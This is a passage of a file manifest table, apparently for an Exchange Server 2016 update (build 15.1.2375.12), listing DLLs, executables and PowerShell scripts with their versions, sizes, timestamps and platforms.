\nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:52| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:53| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:52| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,396| 4-Oct-21| 8:07| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,555| 4-Oct-21| 8:07| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,580| 4-Oct-21| 8:07| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,630| 4-Oct-21| 8:08| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,912| 4-Oct-21| 8:08| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,639| 4-Oct-21| 8:07| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2375.12| 17,800| 4-Oct-21| 8:07| x86 \nEscprint.dll| 15.1.2375.12| 20,360| 4-Oct-21| 7:51| x64 \nEse.dll| 15.1.2375.12| 3,695,496| 4-Oct-21| 7:55| x64 \nEseback2.dll| 15.1.2375.12| 325,000| 4-Oct-21| 8:07| x64 \nEsebcli2.dll| 15.1.2375.12| 292,744| 4-Oct-21| 7:54| x64 \nEseperf.dll| 15.1.2375.12| 116,112| 4-Oct-21| 8:07| x64 \nEseutil.exe| 15.1.2375.12| 398,720| 4-Oct-21| 8:07| x64 \nEsevss.dll| 15.1.2375.12| 44,416| 4-Oct-21| 8:07| x64 \nEtweseproviderresources.dll| 15.1.2375.12| 82,312| 4-Oct-21| 7:47| x64 \nEventperf.dll| 15.1.2375.12| 59,768| 4-Oct-21| 7:50| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,105| 4-Oct-21| 9:50| Not applicable \nExchange.format.ps1xml| Not applicable| 648,604| 4-Oct-21| 9:50| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,322| 4-Oct-21| 9:50| Not applicable \nExchange.ps1| Not applicable| 20,803| 4-Oct-21| 9:50| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,527| 4-Oct-21| 9:43| Not applicable \nExchange.types.ps1xml| Not applicable| 365,145| 4-Oct-21| 9:50| Not applicable \nExchangeudfcommon.dll| 15.1.2375.12| 121,224| 4-Oct-21| 7:51| x86 \nExchangeudfs.dll| 15.1.2375.12| 269,704| 4-Oct-21| 7:53| x86 \nExchmem.dll| 15.1.2375.12| 85,896| 4-Oct-21| 7:51| x64 \nExchsetupmsg.dll| 15.1.2375.12| 19,320| 4-Oct-21| 7:50| x64 \nExchucutil.ps1| Not applicable| 23,912| 4-Oct-21| 8:07| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,024| 4-Oct-21| 7:51| x64 \nExdbmsg.dll| 15.1.2375.12| 229,776| 4-Oct-21| 7:51| x64 \nExeventperfplugin.dll| 15.1.2375.12| 25,472| 4-Oct-21| 7:53| x64 \nExmime.dll| 15.1.2375.12| 364,936| 4-Oct-21| 7:52| x64 \nExportedgeconfig.ps1| Not applicable| 27,383| 4-Oct-21| 8:07| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,554| 4-Oct-21| 8:07| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,846| 4-Oct-21| 8:07| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,410| 4-Oct-21| 7:51| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,157| 4-Oct-21| 8:07| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,036| 4-Oct-21| 8:08| Not applicable \nExppw.dll| 15.1.2375.12| 83,344| 4-Oct-21| 7:52| x64 \nExprfdll.dll| 15.1.2375.12| 26,496| 4-Oct-21| 7:53| x64 \nExrpc32.dll| 15.1.2375.12| 1,922,936| 4-Oct-21| 8:07| x64 \nExrw.dll| 15.1.2375.12| 28,040| 4-Oct-21| 7:50| x64 \nExsetdata.dll| 15.1.2375.12| 2,779,536| 4-Oct-21| 8:07| x64 \nExsetup.exe| 15.1.2375.12| 35,208| 4-Oct-21| 9:45| x86 \nExsetupui.exe| 15.1.2375.12| 193,416| 4-Oct-21| 9:45| x86 \nExtrace.dll| 15.1.2375.12| 245,128| 4-Oct-21| 7:48| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2375.12| 601,488| 4-Oct-21| 8:19| x86 \nExwatson.dll| 15.1.2375.12| 44,936| 4-Oct-21| 7:50| x64 \nFastioext.dll| 15.1.2375.12| 60,296| 4-Oct-21| 7:53| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 4-Oct-21| 11:18| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,229| 4-Oct-21| 11:18| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,761| 4-Oct-21| 11:18| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,406| 4-Oct-21| 11:18| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,658| 4-Oct-21| 11:18| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,727| 4-Oct-21| 11:18| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 4-Oct-21| 11:18| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 4-Oct-21| 11:18| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 4-Oct-21| 11:18| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,346| 4-Oct-21| 11:18| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,260| 4-Oct-21| 11:18| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,755| 4-Oct-21| 11:18| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 4-Oct-21| 11:20| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 4-Oct-21| 11:20| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 4-Oct-21| 11:20| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,731| 4-Oct-21| 11:18| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,761| 4-Oct-21| 11:18| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 4-Oct-21| 11:20| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 4-Oct-21| 11:18| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 4-Oct-21| 11:20| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 4-Oct-21| 11:18| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,758| 4-Oct-21| 11:18| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 4-Oct-21| 11:18| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 4-Oct-21| 11:18| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 4-Oct-21| 11:18| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,745| 4-Oct-21| 11:18| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 4-Oct-21| 11:18| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 4-Oct-21| 11:20| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 4-Oct-21| 11:18| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 4-Oct-21| 11:18| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,227| 4-Oct-21| 8:07| Not applicable \nFilteringpowershell.dll| 15.1.2375.12| 223,112| 4-Oct-21| 8:09| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,691| 4-Oct-21| 8:09| Not applicable \nFiltermodule.dll| 15.1.2375.12| 180,112| 4-Oct-21| 7:52| x64 \nFipexeuperfctrresource.dll| 15.1.2375.12| 15,232| 4-Oct-21| 7:50| x64 \nFipexeventsresource.dll| 15.1.2375.12| 44,936| 4-Oct-21| 7:50| x64 \nFipexperfctrresource.dll| 15.1.2375.12| 32,632| 4-Oct-21| 7:50| x64 \nFirewallres.dll| 15.1.2375.12| 72,568| 4-Oct-21| 7:47| x64 \nFms.exe| 15.1.2375.12| 1,350,024| 4-Oct-21| 8:14| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2375.12| 110,984| 4-Oct-21| 7:50| x64 \nFpsdiag.exe| 15.1.2375.12| 18,832| 4-Oct-21| 7:52| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2375.12| 822,160| 4-Oct-21| 7:52| x64 \nFscconfigsupport.dll| 15.1.2375.12| 56,720| 4-Oct-21| 7:51| x86 \nFscconfigurationserver.exe| 15.1.2375.12| 430,968| 4-Oct-21| 7:54| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2375.12| 15,760| 4-Oct-21| 8:07| x86 \nFsccrypto.dll| 15.1.2375.12| 208,776| 4-Oct-21| 7:50| x64 \nFscipcinterfaceslocal.dll| 15.1.2375.12| 28,536| 4-Oct-21| 7:48| x86 \nFscipclocal.dll| 15.1.2375.12| 38,280| 4-Oct-21| 7:54| x86 \nFscsqmuploader.exe| 15.1.2375.12| 453,496| 4-Oct-21| 8:07| x64 \nGetucpool.ps1| Not applicable| 19,783| 4-Oct-21| 8:07| Not applicable \nGetvalidengines.ps1| Not applicable| 13,266| 4-Oct-21| 8:07| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,781| 4-Oct-21| 7:51| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,631| 4-Oct-21| 7:51| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,699| 4-Oct-21| 7:51| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,751| 4-Oct-21| 7:51| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,474| 4-Oct-21| 7:51| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,681| 4-Oct-21| 7:51| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,786| 4-Oct-21| 7:51| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 4-Oct-21| 8:07| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,979| 4-Oct-21| 8:07| Not applicable \nGet_mitigations.ps1| Not applicable| 25,578| 4-Oct-21| 8:07| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,018| 4-Oct-21| 8:07| Not applicable \nGet_storetrace.ps1| Not applicable| 50,611| 4-Oct-21| 7:55| Not applicable \nHuffman_xpress.dll| 15.1.2375.12| 32,648| 4-Oct-21| 7:52| x64 \nImportedgeconfig.ps1| Not applicable| 77,280| 4-Oct-21| 8:07| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,488| 4-Oct-21| 8:07| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,850| 4-Oct-21| 8:07| Not applicable \nInproxy.dll| 15.1.2375.12| 85,880| 4-Oct-21| 7:51| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,535| 4-Oct-21| 8:11| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,909| 4-Oct-21| 7:51| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,999| 4-Oct-21| 10:15| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2375.12| 107,408| 4-Oct-21| 7:50| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2375.12| 20,360| 4-Oct-21| 7:50| Not applicable \nInterop.certenroll.dll| 15.1.2375.12| 142,712| 4-Oct-21| 7:47| x86 \nInterop.licenseinfointerface.dll| 15.1.2375.12| 14,216| 4-Oct-21| 8:07| x86 \nInterop.netfw.dll| 15.1.2375.12| 34,168| 4-Oct-21| 7:47| x86 \nInterop.plalibrary.dll| 15.1.2375.12| 72,568| 4-Oct-21| 7:47| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2375.12| 27,000| 4-Oct-21| 7:47| Not applicable \nInterop.taskscheduler.dll| 15.1.2375.12| 46,472| 4-Oct-21| 7:47| x86 \nInterop.wuapilib.dll| 15.1.2375.12| 60,816| 4-Oct-21| 7:51| x86 \nInterop.xenroll.dll| 15.1.2375.12| 39,800| 4-Oct-21| 7:47| x86 \nKerbauth.dll| 15.1.2375.12| 62,864| 4-Oct-21| 7:52| x64 \nLicenseinfointerface.dll| 15.1.2375.12| 643,448| 4-Oct-21| 8:07| x64 \nLpversioning.xml| Not applicable| 20,446| 4-Oct-21| 9:45| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,896| 4-Oct-21| 7:55| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2375.12| 138,632| 4-Oct-21| 7:48| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,833| 4-Oct-21| 7:55| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,352| 4-Oct-21| 7:55| Not applicable \nMce.dll| 15.1.2375.12| 1,693,072| 4-Oct-21| 7:53| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,479| 4-Oct-21| 7:55| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,615| 4-Oct-21| 8:07| Not applicable \nMicrosoft.database.isam.dll| 15.1.2375.12| 127,368| 4-Oct-21| 8:07| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2375.12| 26,000| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2375.12| 68,496| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2375.12| 17,784| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2375.12| 232,840| 4-Oct-21| 9:41| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2375.12| 15,760| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2375.12| 43,384| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2375.12| 1,774,984| 4-Oct-21| 9:21| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2375.12| 505,720| 4-Oct-21| 10:08| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2375.12| 76,176| 4-Oct-21| 10:10| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2375.12| 135,568| 4-Oct-21| 9:05| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2375.12| 23,432| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2375.12| 15,744| 4-Oct-21| 7:54| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2375.12| 27,024| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2375.12| 53,624| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2375.12| 924,024| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2375.12| 26,000| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2375.12| 42,384| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2375.12| 15,224| 4-Oct-21| 9:45| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2375.12| 14,712| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2375.12| 70,520| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2375.12| 94,600| 4-Oct-21| 9:51| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2375.12| 15,752| 4-Oct-21| 7:54| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2375.12| 36,752| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2375.12| 15,744| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2375.12| 79,736| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2375.12| 396,176| 4-Oct-21| 9:25| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2375.12| 21,368| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2375.12| 57,224| 4-Oct-21| 9:26| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2375.12| 14,712| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2375.12| 35,712| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2375.12| 276,344| 4-Oct-21| 7:47| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2375.12| 16,264| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2375.12| 25,992| 4-Oct-21| 9:41| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2375.12| 13,696| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2375.12| 23,440| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2375.12| 377,744| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2375.12| 83,840| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2375.12| 2,971,016| 4-Oct-21| 10:11| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2375.12| 5,018,512| 4-Oct-21| 10:08| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2375.12| 894,328| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2375.12| 413,048| 4-Oct-21| 9:51| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2375.12| 924,536| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2375.12| 31,112| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2375.12| 52,104| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2375.12| 21,904| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2375.12| 33,656| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2375.12| 3,525,008| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2375.12| 108,408| 4-Oct-21| 8:07| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2375.12| 288,632| 4-Oct-21| 9:20| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2375.12| 624,008| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2375.12| 86,416| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2375.12| 1,828,240| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2375.12| 31,608| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2375.12| 466,312| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2375.12| 25,976| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2375.12| 38,264| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2375.12| 102,800| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2375.12| 48,528| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2375.12| 67,464| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.common.dll| 15.1.2375.12| 172,944| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2375.12| 113,528| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2375.12| 13,688| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2375.12| 130,440| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2375.12| 63,864| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2375.12| 19,840| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2375.12| 15,240| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2375.12| 107,920| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2375.12| 17,784| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2375.12| 51,088| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2375.12| 36,752| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2375.12| 27,528| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2375.12| 1,042,320| 4-Oct-21| 8:13| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2375.12| 29,072| 4-Oct-21| 7:47| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2375.12| 13,184| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2375.12| 181,128| 4-Oct-21| 9:52| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2375.12| 30,088| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2375.12| 22,408| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2375.12| 85,880| 4-Oct-21| 7:47| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2375.12| 51,064| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2375.12| 37,256| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2375.12| 50,576| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2375.12| 33,144| 4-Oct-21| 9:07| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2375.12| 1,099,656| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2375.12| 206,216| 4-Oct-21| 9:07| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2375.12| 210,832| 4-Oct-21| 9:27| x86 \nMicrosoft.exchange.compression.dll| 15.1.2375.12| 17,296| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2375.12| 37,768| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2375.12| 14,200| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2375.12| 145,800| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2375.12| 14,216| 4-Oct-21| 7:54| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2375.12| 53,120| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2375.12| 15,760| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2375.12| 23,440| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2375.12| 54,648| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2375.12| 13,704| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2375.12| 1,845,640| 4-Oct-21| 9:02| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2375.12| 30,088| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2375.12| 68,496| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2375.12| 15,248| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2375.12| 21,376| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2375.12| 25,976| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2375.12| 169,848| 4-Oct-21| 8:13| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2375.12| 330,120| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2375.12| 173,960| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2375.12| 71,048| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2375.12| 203,656| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2375.12| 27,008| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2375.12| 51,568| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2375.12| 51,576| 4-Oct-21| 8:27| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2375.12| 46,992| 4-Oct-21| 8:24| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2375.12| 1,092,496| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2375.12| 57,232| 4-Oct-21| 7:53| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2375.12| 326,520| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2375.12| 3,357,584| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2375.12| 35,720| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2375.12| 17,808| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2375.12| 165,256| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2375.12| 619,408| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2375.12| 7,792,008| 4-Oct-21| 8:28| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2375.12| 80,272| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.data.dll| 15.1.2375.12| 1,964,408| 4-Oct-21| 8:22| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2375.12| 1,625,992| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2375.12| 364,424| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2375.12| 105,352| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2375.12| 15,752| 4-Oct-21| 8:41| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2375.12| 224,648| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2375.12| 186,248| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2375.12| 39,824| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2375.12| 119,184| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2375.12| 968,080| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2375.12| 141,184| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2375.12| 769,416| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2375.12| 139,656| 4-Oct-21| 8:42| x86 